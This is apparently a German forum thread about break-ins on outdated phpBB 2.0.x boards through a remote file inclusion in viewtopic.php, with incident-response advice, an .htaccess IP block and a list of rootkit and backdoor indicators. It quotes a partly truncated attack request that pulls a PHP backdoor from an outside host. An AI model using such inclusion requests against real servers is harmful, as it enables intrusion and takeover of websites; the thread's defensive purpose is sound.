ABAKUS

Habe in den letzten Tagen einige Angriffe auf phpBB foren feststellen müssen.

Alle, die diese Software nutzen, sollten auf ihrem Server nach einer Datei suchen, die iframe.php heißt. Hierbei handelt es sich um die gh0st shell.


Der erste Einbruch erfolgt z.B. über:
viewtopic.php?t=1&c=https://qwe666.nm.ru/rst&highlight=%252 ... clude%2527

bei nicht ganz aktuellen Systemen.
Meist wird in (irgendeinem) Subdirectory die datei iframe.php installiert, mit der das Hantieren auf dem infiltriertem System sehr leicht ist.

Bei Interesse kann ich weitere Infos zur Verfügung stellen.

mit der htaccess müsste ich das doch aussprerren können, so dass urls
mit *include* nen 301 bekommen.
funktioniert leider nicht.

zum anderen: wie kommt die datei auf den Server?

Die Datei https://qwe666.nm.ru/rst
installiert dir eine Backdoor.
Über diese ist es möglich, eigentlich alles zu machen, was man machen kann,
wie z.B. sich einen Nutzeraccount anzulegen.

Falls du die Datei iframe.php auf dem Server hast, ruf sie mal auf.
Schon siehst du, was alles möglich ist.
Im Normalfall lassen sich über dieses Programm auch Exploits von
https://gh0sts.org/base/exploits.txt
installieren.
Diese Datei wird von iframe.php einfach über include genutzt.

Falls es dann soweit gekommen ist, hast du einen äusserst unsicheren Server und solltest über eine Systemneuinstallation nachdenken.

Ach ja, mit dem Programm https://www.chkrootkit.org/ kannst du mal nachsehen, was es alles für nette Rootkits auf deinem Server gibt (kein Anspruch auf Vollständigkeit).

da bekommt man Angstzustände
Was mach ich dagegen?

Die Angriffe gingen meist von folgenden IP aus:
213.228.125.3
und vom Einwahlblock irtel.ru
213.228.

Kann man also (wenn Nameserver-Auflösung aktiv ist) z.B. über .htaccess sperren.

<LIMIT GET POST>
ORDER ALLOW,DENY
ALLOW FROM ALL
deny from 213.228.125.3
deny from irtel.ru
</LIMIT>

Danke für die Hinweise. Die iframe.php war tatsächlich auf unserem Server. Aber wie kam sie da drauf? Über eine Lücke in der viewtopic.php? Kann man davon ausgehen daß die Lücke in der aktuellen Version (2.0.17) jetzt geschlossen ist?

Danke schonmal

Zur Version: Ich kann nicht sagen, welche Versionen sicher sind.
Ich selber betreibe keine Foren, setze mich maximal mit gehackten Servern auseinander, sorry.

Der Einbuch wurde über die viewtopic.php vorgenommen.
Das Programm https://qwe666.nm.ru/rst (ist ein PHP-Programm, das über die viewtopic.php includiert wird, ermöglicht verschieden Funktionen, u.a.
- dateien aufzuladen (nicht nur im Foren-Verzeichnis !)
- Kommandos auszuführen
- Backdoors bzw. Exploits zu installieren
usw. usf.

Meist wird also auch noch (mindestens) eine Backdoor installiert, um zukünftig auch
auf dem Server werkeln zu können.

Beliebte Speicherplätze für so was ist z.B. das Directorie
/tmp/ und der Pfad ..., den man normalerweise ja nicht mit angezeigt bekommt.
Falls Du root-Zugang hast, gib mal cd /var/... ein.
Wenn es diesen Pfad gibt, sollte es zu denken geben.

Also, es ist Zeit, für einen erweiterten Sicherheitscheck oder eine Neuinstallation !

@Pompom: Welche phpBB Version lief denn bei dem gehackten Board?

phpBB 2.0.6 bis phpBB 2.0.15

Was für Möglichkeiten gibt es denn für einen erweiterten Sicherheitscheck? Nach was sollte man suchen?
Ich glaub die viewtopic.php wurde mit dem letzten Update gefixt. Aber können deshalb (durch Nutzung der vorherigen Lücke) immer noch Schlupflöcher vorhanden sein? Wie findet man diese?

Danke schonmal

Zum Thema Sicherheitscheck:

Wenn du die Jungs auf dem Server hattest, kannst du kaum noch herausbekommen, was sie so getrieben haben, da aktuelle Exploits auch die Logs löschen oder säubern.

Es gibt ein paar Ansatzpunkte:
- nutze https://www.chkrootkit.org um herauszubekommen, ob bekannte Rootkits installiert wurden.
- schau nach:
/usr/include/file.h - diese Dateien werden versteckt.
/usr/include/proc.h - diese Prozesse werden von ps nicht angezeigt
/usr/include/hosts.h - werden vor netstat verborgen
/usr/include/log.h - werden in den Logs verborgen
/lib/lblip.tk - eine SSH-Backdoor
/lib/ldd.so - ist ein scniffer und log cleaner.

schau im Log des Servers nach, wann die Infektion mit der iframe.php passiert ist
bzw. ein Aufruf viewtopic.php?t=1&c=http://(domainname.tld)/url erfolgte.

Schau im /bin /sbin /usr/bin /usr/sbin nach, ob dort Programme zu finden sind, deren Datum neuer ist, als der Logeintrag mit der Infektion.

Schau im /tmp und /usr/tmp mit ps -a nach, ob es Dateien/Verzeichnisse gibt, die du nicht kennst.

Schau auf dem Server nach, ob es eine Datei hydra* gibt (ist ein Passwort-Brecher)
dieser wird benutzt, um deine Passwörter oder auch von deinem System Paßwörter auf anderen Servern zu kracken

Schau nach, ob du eine Datei udp.pl findest.
Dies ist ein UDP flood, der DoS-Attacken auf deinen Server oder andere Server durchführen kann

Schau nach, ob du ein Programm a.pl findest. Dies ist ein Shell BOT und ermöglicht die Kommunikation zwischen deinem Server und dem IRC.

Schau nach einer Datei blackhole, dies ist eine Backdoor auf deinem Server.

Schau nach einem Script hide, dies ist ein Log-Cleaner.


suche nach nmap* - ist ein Tool, mit dem Sicherheitslöcher ausgespäht werden können.

Suche nach pscan und ssh-scan, sind Passwort-Scanner.

Tja, und wenn da irgendwas auftaucht bzw auffällig ist, dann hört es ohne tiefere Systemkenntnisse auf. Dann ist das beste, das Sicherheitsloch "dicht" zu machen und das Betriebssystem neu zu installieren bzw. installieren zu lassen.

Ok, vielen Dank schonmal. Mal sehen was bei rauskommt...

von 2.0.15 nach 2.0.16 wurde was in der viewtopic gefixt.
Was das war das wissen die phpbb porfis besser.

Hat jemand schon nen thread bei phpbb.com gestartet?
Kann durchaus sein, dass das Problem auch bei der aktuellen Version
2.0.17 auftritt.

Ja, war dieses loch da...

https://www.google.de/search?hl=de&c2co ... ion+&meta=